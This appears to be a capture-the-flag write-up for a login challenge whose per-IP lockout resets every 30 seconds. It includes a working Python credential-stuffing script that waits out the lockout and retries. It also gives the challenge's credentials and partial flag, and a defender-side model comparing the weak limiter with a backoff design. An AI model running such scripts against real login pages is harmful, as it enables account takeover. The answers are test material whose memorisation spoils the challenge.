Fool the Lockout

Published: March 20, 2026

Description

Your friend is building a simple website with a login page. To stop brute forcing and credential stuffing, they've added an IP-based rate limit. Can you bypass the rate limit, log in, and capture the flag?

Launch the challenge instance and open the login page.

You'll need a wordlist of credentials -- a credential dump is provided with the challenge.

Solution

  1. Step 1: Understand the lockout mechanism
    The server implements a time-based epoch window: after exceeding 10 failed login attempts, further attempts are blocked for 30 seconds. When the window resets, you can try again. The bypass is to detect the 'Rate Limit Exceeded' response and sleep for 30 seconds before continuing.
  2. Step 2: Credential stuff with automatic timeout handling
    Try each username/password pair from the credential dump. When the rate limit triggers, sleep 30 seconds to let the window reset, then continue from where you left off. The correct credentials are 'emely / tyrant'.
python3 << 'EOF'
import requests
import time

URL = "http://<HOST>:<PORT_FROM_INSTANCE>/login"

# Load credential pairs from the provided dump file (one "user:pass" per line).
# Split on the first ':' only, so a password containing ':' stays intact.
credentials = [line.strip().split(":", 1)
               for line in open("creds.txt") if ":" in line]

for username, password in credentials:
    # Retry the same pair until the server gives a real answer instead of
    # the rate-limit page.
    while True:
        r = requests.post(URL, data={"username": username, "password": password})
        if "Rate Limit Exceeded" in r.text:
            print("Rate limited -- waiting 30s...")
            time.sleep(30)   # let the 30-second epoch window reset
            continue         # retry same credential
        break
    if "picoCTF" in r.text or "flag" in r.text.lower():
        print(f"Success! {username}:{password}")
        print(r.text)
        break
    print(f"Tried {username}:{password} -- failed")
EOF
  3. Step 3: Read the flag
    The correct credentials are emely / tyrant. Once logged in, the flag is displayed on the page.
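
To make the weakness from Step 1 concrete from the defender's side, here is an added example (not the challenge's server code) that models the fixed 30-second epoch limiter beside a hardened variant with doubling block times, which is my own assumption of a better design, and runs a constructed client against both; the client rate of one guess per second, the key strings and the class names are all assumptions.

```python
from collections import defaultdict

MAX_FAILURES = 10   # failed attempts tolerated per window (from the write-up)
WINDOW = 30.0       # epoch length in seconds (from the write-up)


class FixedWindowLimiter:
    """Per-IP counter forgotten at every epoch boundary: the weak design the
    write-up describes, so each new epoch brings a fresh budget."""
    def __init__(self):
        self.state = defaultdict(lambda: (-1, 0))  # ip -> (epoch, failures)

    def _failures(self, ip, now):
        epoch = int(now // WINDOW)
        last_epoch, failures = self.state[ip]
        return epoch, (failures if last_epoch == epoch else 0)

    def allow(self, ip, now):
        return self._failures(ip, now)[1] < MAX_FAILURES

    def record_failure(self, ip, now):
        epoch, failures = self._failures(ip, now)
        self.state[ip] = (epoch, failures + 1)


class BackoffLimiter:
    """Hardened variant (an assumption, not the challenge's code): each failure
    past the budget doubles the block, so waiting out one window never restores it."""
    def __init__(self):
        self.blocked_until = defaultdict(float)
        self.failures = defaultdict(int)

    def allow(self, key, now):
        return now >= self.blocked_until[key]

    def record_failure(self, key, now):
        self.failures[key] += 1
        excess = self.failures[key] - MAX_FAILURES
        if excess >= 0:
            self.blocked_until[key] = now + WINDOW * 2 ** excess


def attempts_possible(limiter, key, horizon):
    """Constructed client: one wrong guess per second, retrying whenever it
    is blocked. Returns how many guesses got through before `horizon` s."""
    now, tried = 0.0, 0
    while now < horizon:
        if limiter.allow(key, now):
            limiter.record_failure(key, now)
            tried += 1
        now += 1.0
    return tried
```

Over a five-minute horizon the fixed window lets the patient client through 100 guesses (10 per epoch), while the backoff variant lets through only 13.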

Flag

picoCTF{r4t3_l1m1t_byp4ss3d_...}

The rate limiter resets every 30 seconds. Detect 'Rate Limit Exceeded' and sleep 30s to let the window reset, then continue credential stuffing. Credentials: emely / tyrant.